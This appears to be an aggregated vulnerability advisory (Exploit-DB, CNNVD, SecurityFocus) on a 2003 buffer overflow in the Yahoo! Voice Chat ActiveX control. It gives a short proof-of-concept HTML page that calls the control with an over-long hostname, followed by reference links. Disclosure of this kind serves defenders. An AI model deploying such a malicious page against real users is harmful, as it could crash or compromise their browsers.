https://www.exploit-db.com/exploits/22593
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-431

Yahoo!VoiceChat是一款音频聊天程序，以ActiveX控件形式安装。Yahoo!VoiceChatActiveX控件存在一个漏洞，远程攻击者可以利用这个漏洞构建恶意页面，诱使用户访问，触发漏洞。目前没有详细漏洞细节提供，此漏洞将会在以后更新。

source: http://www.securityfocus.com/bid/7561/info

It has been reported that the ActiveX control used by the Yahoo! Voice Chat feature is prone to an exploitable buffer overflow vulnerability. This issue can be exploited via a malicious web page that calls the vulnerable control with malformed parameters. Although unconfirmed, it has been conjectured that this condition may be exploited to execute arbitrary code. 

------sample.htm-----------
<OBJECT id=yahooaudio type="application/x-oleobject"

classid="clsid:2B323CD9-50E3-11D3-9466-00A0C9700498">
</OBJECT>
<script>
yahooaudio.hostname="longstringheremorethan500chars";
yahooaudio.createandjoinconference();
</script>
---------------------------

来源:US-CERTVulnerabilityNote:VU#272644
名称:VU#272644
链接:http://www.kb.cert.org/vuls/id/272644
来源:BUGTRAQ
名称:20030530Yahoo!SecurityAdvisory:Yahoo!VoiceChat
链接:http://www.securityfocus.com/archive/1/323439
来源:SECUNIA
名称:8924
链接:http://secunia.com/advisories/8924
来源:XF
名称:yahoo-audio-bo(12130)
链接:http://xforce.iss.net/xforce/xfdb/12130
来源:BID
名称:7561
链接:http://www.securityfocus.com/bid/7561
来源:help.yahoo.com
链接:http://help.yahoo.com/help/us/mesg/use/use-45.html
来源：NSFOCUS
名称：4824
链接：http://www.nsfocus.net/vulndb/4824